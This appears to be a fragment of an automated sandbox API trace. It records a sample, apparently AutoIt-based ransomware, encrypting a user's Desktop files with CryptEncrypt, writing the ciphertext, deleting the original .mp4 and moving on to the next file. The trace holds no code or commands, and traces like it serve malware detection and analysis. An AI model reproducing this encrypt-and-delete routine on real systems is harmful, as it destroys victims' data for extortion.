[0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0128.957] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.957] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.957] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0128.957] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0128.957] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0128.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0128.958] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0128.958] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.958] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0128.958] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.958] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb2e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0128.958] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x8d0a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x8d10) returned 1 [0128.958] CharLowerBuffW (in: lpsz="byte[36113]", cchLength=0xb | out: lpsz="byte[36113]") returned 0xb [0128.958] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.959] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb450, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0128.959] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49c4758*, pdwDataLen=0x144e538*=0x8d0a, dwBufLen=0x8d10 | out: pbData=0x49c4758*, pdwDataLen=0x144e538*=0x8d10) returned 1 [0128.959] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0128.959] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0128.959] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.959] WriteFile (in: hFile=0x2a0, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x8d10, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144ef3c*=0x8d10, lpOverlapped=0x0) returned 1 [0128.961] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0128.961] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.961] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0128.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caf88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0128.962] CryptDestroyKey (hKey=0x41ac700) returned 1 [0128.962] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0128.962] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0128.962] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.962] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0129.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0129.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.044] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.044] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0129.044] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0129.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0129.045] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0129.045] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.045] FreeLibrary (hLibModule=0x756e0000) returned 1 [0129.045] CloseHandle (hObject=0x258) returned 1 [0129.045] CloseHandle (hObject=0x2a0) returned 1 [0129.050] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\-ibxuw5BT.mp4", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\-ibxuw5BT.mp4", lpFilePart=0x0) returned 0x32 [0129.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d7d0 [0129.050] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\-ibxuw5BT.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\-ibxuw5bt.mp4")) returned 0x20 [0129.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0129.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0129.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0129.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0129.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0129.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0129.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0129.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0129.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0129.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0129.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dcf8 [0129.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a298 [0129.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a030 [0129.051] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\-ibxuw5BT.mp4", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce390d0, ftCreationTime.dwHighDateTime=0x1d5efbf, ftLastAccessTime.dwLowDateTime=0x4f30df70, ftLastAccessTime.dwHighDateTime=0x1d5ed2a, ftLastWriteTime.dwLowDateTime=0x4f30df70, ftLastWriteTime.dwHighDateTime=0x1d5ed2a, nFileSizeHigh=0x0, nFileSizeLow=0x8d0a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="-ibxuw5BT.mp4", cAlternateFileName="-IBXUW~1.MP4")) returned 0x41ac640 [0129.051] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\-ibxuw5BT.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\-ibxuw5bt.mp4")) returned 1 [0129.263] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce390d0, ftCreationTime.dwHighDateTime=0x1d5efbf, ftLastAccessTime.dwLowDateTime=0x4f30df70, ftLastAccessTime.dwHighDateTime=0x1d5ed2a, ftLastWriteTime.dwLowDateTime=0x4f30df70, ftLastWriteTime.dwHighDateTime=0x1d5ed2a, nFileSizeHigh=0x0, nFileSizeLow=0x8d0a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="-ibxuw5BT.mp4", cAlternateFileName="-IBXUW~1.MP4")) returned 0 [0129.263] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0129.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a030 | out: hHeap=0x1780000) returned 1 [0129.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0129.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d7d0 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0129.264] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0129.264] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0129.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0129.264] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0129.302] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0129.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0129.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0129.302] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0129.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0129.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0129.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2670 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d70 [0129.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0129.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5a98 [0129.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d70 | out: hHeap=0x1780000) returned 1 [0129.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0129.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0129.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0129.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0129.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0129.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0129.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0129.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0129.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0129.304] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0129.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0129.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0129.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0129.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0129.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0129.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0129.304] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0129.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0129.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0129.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0129.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0129.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0129.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0129.304] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\1aQmLq17nlG1P.bmp", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c93870, ftCreationTime.dwHighDateTime=0x1d5f0f3, ftLastAccessTime.dwLowDateTime=0x510b6f50, ftLastAccessTime.dwHighDateTime=0x1d5f0ad, ftLastWriteTime.dwLowDateTime=0x510b6f50, ftLastWriteTime.dwHighDateTime=0x1d5f0ad, nFileSizeHigh=0x0, nFileSizeLow=0x7203, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="1aQmLq17nlG1P.bmp", cAlternateFileName="1AQMLQ~1.BMP")) returned 0x41ac440 [0129.305] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0129.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0129.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0129.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0129.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0129.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0129.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0129.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43925e0 [0129.305] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0129.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43925e0 | out: hHeap=0x1780000) returned 1 [0129.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0129.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0129.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0129.306] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0129.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0129.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0129.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0129.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0129.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392458 [0129.307] 